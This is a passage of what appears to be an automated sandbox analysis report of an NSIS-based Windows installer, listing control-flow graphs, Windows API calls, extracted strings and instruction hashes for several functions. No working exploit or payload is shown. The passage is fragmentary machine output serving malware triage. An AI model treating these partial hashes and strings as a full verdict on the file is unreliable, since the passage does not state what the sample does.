185->190 200 403ae1-403af1 call 405ca0 ExitProcess 186->200 201 403bce-403bd4 186->201 192 403ab5-403abc call 40592c 187->192 193 403a57-403a60 call 405d06 187->193 189->184 189->190 190->184 199 403ac1-403ac7 call 4060e7 192->199 203 403a79-403a7b 193->203 199->186 206 403c51-403c59 201->206 207 403bd6-403bf3 call 4062fc * 3 201->207 202->160 211 403a62-403a74 call 403800 203->211 212 403a7d-403a87 203->212 213 403c5b 206->213 214 403c5f 206->214 238 403bf5-403bf7 207->238 239 403c3d-403c48 ExitWindowsEx 207->239 211->212 225 403a76 211->225 219 403af7-403b11 lstrcatW lstrcmpiW 212->219 220 403a89-403a99 call 40677e 212->220 213->214 219->186 224 403b13-403b29 CreateDirectoryW SetCurrentDirectoryW 219->224 220->186 231 403a9b-403ab1 call 406009 * 2 220->231 228 403b36-403b56 call 406009 * 2 224->228 229 403b2b-403b31 call 406009 224->229 225->203 245 403b5b-403b77 call 406805 DeleteFileW 228->245 229->228 231->192 238->239 243 403bf9-403bfb 238->243 239->206 242 403c4a-403c4c call 40141d 239->242 242->206 243->239 247 403bfd-403c0f GetCurrentProcess 243->247 253 403bb8-403bc0 245->253 254 403b79-403b89 CopyFileW 245->254 247->239 252 403c11-403c33 247->252 252->239 253->245 255 403bc2-403bc9 call 406c68 253->255 254->253 256 403b8b-403bab call 406c68 call 406805 call 405c3f 254->256 255->186 256->253 266 403bad-403bb4 CloseHandle 256->266 266->253
                                                                                  APIs
                                                                                  • #17.COMCTL32 ref: 004038A2
                                                                                  • SetErrorMode.KERNELBASE(00008001), ref: 004038AD
                                                                                  • OleInitialize.OLE32(00000000), ref: 004038B4
                                                                                    • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                    • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                    • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                  • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                                                                                    • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                  • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                                                                                  • GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
                                                                                  • CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
                                                                                  • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                                                                                  • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                                                                                  • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                                                                                  • DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
                                                                                  • OleUninitialize.OLE32(?), ref: 00403AD1
                                                                                  • ExitProcess.KERNEL32 ref: 00403AF1
                                                                                  • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                                                                                  • lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
                                                                                  • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                                                                                  • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
                                                                                  • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                                                                                  • CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
                                                                                  • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                                                                                  • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                                                                                  • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                  • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                                                                                  • API String ID: 2435955865-239407132
                                                                                  • Opcode ID: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                                                  • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                                                                                  • Opcode Fuzzy Hash: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                                                  • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E
                                                                                  Function 004074BB Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 646 4074bb-4074c0 647 4074c2-4074ef 646->647 648 40752f-407547 646->648 650 4074f1-4074f4 647->650 651 4074f6-4074fa 647->651 649 407aeb-407aff 648->649 655 407b01-407b17 649->655 656 407b19-407b2c 649->656 652 407506-407509 650->652 653 407502 651->653 654 4074fc-407500 651->654 657 407527-40752a 652->657 658 40750b-407514 652->658 653->652 654->652 659 407b33-407b3a 655->659 656->659 662 4076f6-407713 657->662 663 407516 658->663 664 407519-407525 658->664 660 407b61-407c68 659->660 661 407b3c-407b40 659->661 677 407350 660->677 678 407cec 660->678 666 407b46-407b5e 661->666 667 407ccd-407cd4 661->667 669 407715-407729 662->669 670 40772b-40773e 662->670 663->664 665 407589-4075b6 664->665 673 4075d2-4075ec 665->673 674 4075b8-4075d0 665->674 666->660 671 407cdd-407cea 667->671 675 407741-40774b 669->675 670->675 676 407cef-407cf6 671->676 679 4075f0-4075fa 673->679 674->679 680 40774d 675->680 681 4076ee-4076f4 675->681 682 407357-40735b 677->682 683 40749b-4074b6 677->683 684 40746d-407471 677->684 685 4073ff-407403 677->685 678->676 688 407600 679->688 689 407571-407577 679->689 690 407845-4078a1 680->690 691 4076c9-4076cd 680->691 681->662 687 407692-40769c 681->687 682->671 692 407361-40736e 682->692 683->649 697 407c76-407c7d 684->697 698 407477-40748b 684->698 703 407409-407420 685->703 704 407c6d-407c74 685->704 693 4076a2-4076c4 687->693 694 407c9a-407ca1 687->694 706 407556-40756e 688->706 707 407c7f-407c86 688->707 695 40762a-407630 689->695 696 40757d-407583 689->696 690->649 699 407c91-407c98 691->699 700 4076d3-4076eb 691->700 692->678 708 407374-4073ba 692->708 693->690 694->671 709 40768e 695->709 710 407632-40764f 695->710 696->665 696->709 697->671 705 40748e-407496 698->705 699->671 700->681 711 407423-407427 703->711 704->671 705->684 715 407498 705->715 706->689 707->671 713 4073e2-4073e4 708->713 714 4073bc-4073c0 708->714 709->687 716 407651-407665 710->716 717 407667-40767a 710->717 711->685 712 407429-40742f 711->712 719 407431-407438 712->719 720 407459-40746b 712->720 723 4073f5-4073fd 713->723 724 4073e6-4073f3 713->724 721 4073c2-4073c5 GlobalFree 714->721 722 4073cb-4073d9 GlobalAlloc 714->722 715->683 718 40767d-407687 716->718 717->718 718->695 725 407689 718->725 726 407443-407453 GlobalAlloc 719->726 727 40743a-40743d GlobalFree 719->727 720->705 721->722 722->678 728 4073df 722->728 723->711 724->723 724->724 730 407c88-407c8f 725->730 731 40760f-407627 725->731 726->678 726->720 727->726 728->713 730->671 731->695
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                                  • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                                                                                  • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                                  • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                                                                                  Function 004062FC Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                  • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressHandleLibraryLoadModuleProc
                                                                                  • String ID:
                                                                                  • API String ID: 310444273-0
                                                                                  • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                                  • Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
                                                                                  • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                                  • Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
                                                                                  Function 004062D5 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                                  • FindClose.KERNEL32(00000000), ref: 004062EC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Find$CloseFileFirst
                                                                                  • String ID:
                                                                                  • API String ID: 2295610775-0
                                                                                  • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                                  • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                                                                                  • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                                  • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8
                                                                                  Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351sleepfilewindowCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 0 4015a0-4015f4 1 4030e3-4030ec 0->1 2 4015fa 0->2 26 4030ee-4030f2 1->26 4 401601-401611 call 4062a3 2->4 5 401742-40174f 2->5 6 401962-40197d call 40145c GetFullPathNameW 2->6 7 4019ca-4019e6 call 40145c SearchPathW 2->7 8 40176e-401794 call 40145c call 4062a3 SetFileAttributesW 2->8 9 401650-401668 call 40137e call 4062a3 call 40139d 2->9 10 4017b1-4017d8 call 40145c call 4062a3 call 405d59 2->10 11 401672-401686 call 40145c call 4062a3 2->11 12 401693-4016ac call 401446 call 4062a3 2->12 13 401715-401731 2->13 14 401616-40162d call 40145c call 4062a3 call 404f72 2->14 15 4016d6-4016db 2->15 16 401736-4030de 2->16 17 401897-4018a7 call 40145c call 4062d5 2->17 18 4018db-401910 call 40145c * 3 call 4062a3 MoveFileW 2->18 19 40163c-401645 2->19 20 4016bd-4016d1 call 4062a3 SetForegroundWindow 2->20 4->26 30 401751-401755 ShowWindow 5->30 31 401758-40175f 5->31 65 4019a3-4019a8 6->65 66 40197f-401984 6->66 7->1 58 4019ec-4019f8 7->58 8->1 83 40179a-4017a6 call 4062a3 8->83 92 40166d 9->92 105 401864-40186c 10->105 106 4017de-4017fc call 405d06 CreateDirectoryW 10->106 84 401689-40168e call 404f72 11->84 89 4016b1-4016b8 Sleep 12->89 90 4016ae-4016b0 12->90 13->26 27 401632-401637 14->27 24 401702-401710 15->24 25 4016dd-4016fd call 401446 15->25 16->1 60 4030de call 405f51 16->60 85 4018c2-4018d6 call 4062a3 17->85 86 4018a9-4018bd call 4062a3 17->86 113 401912-401919 18->113 114 40191e-401921 18->114 19->27 28 401647-40164e PostQuitMessage 19->28 20->1 24->1 25->1 27->26 28->27 30->31 31->1 49 401765-401769 ShowWindow 31->49 49->1 58->1 60->1 69 4019af-4019b2 65->69 66->69 76 401986-401989 66->76 69->1 79 4019b8-4019c5 GetShortPathNameW 69->79 76->69 87 40198b-401993 call 4062d5 76->87 79->1 100 4017ab-4017ac 83->100 84->1 85->26 86->26 87->65 110 401995-4019a1 call 406009 87->110 89->1 90->89 92->26 100->1 108 401890-401892 105->108 109 40186e-40188b call 404f72 call 406009 SetCurrentDirectoryW 105->109 118 401846-40184e call 4062a3 106->118 119 4017fe-401809 GetLastError 106->119 108->84 109->1 110->69 113->84 120 401923-40192b call 4062d5 114->120 121 40194a-401950 114->121 133 401853-401854 118->133 124 401827-401832 GetFileAttributesW 119->124 125 40180b-401825 GetLastError call 4062a3 119->125 120->121 139 40192d-401948 call 406c68 call 404f72 120->139 129 401957-40195d call 4062a3 121->129 131 401834-401844 call 4062a3 124->131 132 401855-40185e 124->132 125->132 129->100 131->133 132->105 132->106 133->132 139->129
                                                                                  APIs
                                                                                  • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                  • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                  • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                  • ShowWindow.USER32(?), ref: 00401753
                                                                                  • ShowWindow.USER32(?), ref: 00401767
                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                  • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                  • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                  • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                  • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                  • SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                  • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                  • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                  • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                  • SearchPathW.KERNEL32(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                  Strings
                                                                                  • Rename on reboot: %s, xrefs: 00401943
                                                                                  • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                  • Rename failed: %s, xrefs: 0040194B
                                                                                  • Rename: %s, xrefs: 004018F8
                                                                                  • detailprint: %s, xrefs: 00401679
                                                                                  • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                  • Sleep(%d), xrefs: 0040169D
                                                                                  • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                  • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                  • BringToFront, xrefs: 004016BD
                                                                                  • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                  • SetFileAttributes failed., xrefs: 004017A1
                                                                                  • Aborting: "%s", xrefs: 0040161D
                                                                                  • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                  • Jump: %d, xrefs: 00401602
                                                                                  • Call: %d, xrefs: 0040165A
                                                                                  • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                  • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                  • API String ID: 2872004960-3619442763
                                                                                  • Opcode ID: 2a82ad59b9370b3cc3d5141fac41001cfacad1d5dd7d37275e8bf63d0114621f
                                                                                  • Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
                                                                                  • Opcode Fuzzy Hash: 2a82ad59b9370b3cc3d5141fac41001cfacad1d5dd7d37275e8bf63d0114621f
                                                                                  • Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE
                                                                                  Function 0040592C Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233stringregistrylibraryCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 267 40592c-405944 call 4062fc 270 405946-405956 call 405f51 267->270 271 405958-405990 call 405ed3 267->271 279 4059b3-4059dc call 403e95 call 40677e 270->279 276 405992-4059a3 call 405ed3 271->276 277 4059a8-4059ae lstrcatW 271->277 276->277 277->279 285 405a70-405a78 call 40677e 279->285 286 4059e2-4059e7 279->286 292 405a86-405a8d 285->292 293 405a7a-405a81 call 406805 285->293 286->285 287 4059ed-405a15 call 405ed3 286->287 287->285 294 405a17-405a1b 287->294 296 405aa6-405acb LoadImageW 292->296 297 405a8f-405a95 292->297 293->292 301 405a1d-405a2c call 405d06 294->301 302 405a2f-405a3b lstrlenW 294->302 299 405ad1-405b13 RegisterClassW 296->299 300 405b66-405b6e call 40141d 296->300 297->296 298 405a97-405a9c call 403e74 297->298 298->296 306 405c35 299->306 307 405b19-405b61 SystemParametersInfoW CreateWindowExW 299->307 319 405b70-405b73 300->319 320 405b78-405b83 call 403e95 300->320 301->302 303 405a63-405a6b call 406722 call 406009 302->303 304 405a3d-405a4b lstrcmpiW 302->304 303->285 304->303 311 405a4d-405a57 GetFileAttributesW 304->311 310 405c37-405c3e 306->310 307->300 316 405a59-405a5b 311->316 317 405a5d-405a5e call 406751 311->317 316->303 316->317 317->303 319->310 325 405b89-405ba6 ShowWindow LoadLibraryW 320->325 326 405c0c-405c14 call 405047 320->326 328 405ba8-405bad LoadLibraryW 325->328 329 405baf-405bc1 GetClassInfoW 325->329 334 405c16-405c1c 326->334 335 405c2e-405c30 call 40141d 326->335 328->329 330 405bc3-405bd3 GetClassInfoW RegisterClassW 329->330 331 405bd9-405c0a DialogBoxParamW call 40141d call 403c68 329->331 330->331 331->310 334->319 337 405c22-405c29 call 40141d 334->337 335->306 337->319
                                                                                  APIs
                                                                                    • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                    • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                    • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                  • lstrcatW.KERNEL32(004D30C0,00447240), ref: 004059AE
                                                                                  • lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
                                                                                  • lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                                                                                  • GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E
                                                                                    • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                  • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                                                                                  • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                                                                                  • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                                                                                    • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                                                                                  • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                                                                                  • LoadLibraryW.KERNEL32(RichEd20), ref: 00405BA2
                                                                                  • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                                                                                  • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                                                                                  • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                                                                                  • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                                                                                  • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                  • String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                  • API String ID: 608394941-1650083594
                                                                                  • Opcode ID: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                                                  • Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
                                                                                  • Opcode Fuzzy Hash: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                                                  • Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E
                                                                                  Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185stringtimeCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                  • lstrcatW.KERNEL32(00000000,00000000), ref: 00401A76
                                                                                  • CompareFileTime.KERNEL32(-00000014,?,FeesPhpbb,FeesPhpbb,00000000,00000000,FeesPhpbb,004CB0B0,00000000,00000000), ref: 00401AA0
                                                                                    • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                    • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                    • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                    • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                                                                                    • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
